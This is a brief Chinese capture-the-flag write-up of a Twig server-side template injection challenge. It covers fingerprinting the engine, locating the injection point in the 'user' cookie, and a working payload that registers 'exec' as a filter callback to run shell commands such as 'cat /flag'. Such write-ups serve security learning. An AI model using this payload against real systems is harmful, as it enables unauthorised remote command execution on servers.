这是一道模板注入题,模板注入题流程图(搬运来的)
首先在 /flag.php 这页测试,测试结果是Twig
Twig {{7*'7'}} #输出49 Jinja {{7*'7'}} #输出7777777
因为hint.php源码可以看到有关 cookie 的提示,抓包看一下cookie和注入点的关系
登录进去之后抓包,发现 cookie 里面 user 是注入点
直接拿 ssti 注入这篇文章(链接在最后)的 payload 打
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
把 id 换成 cat /flag 可以直接得到 flag
参考: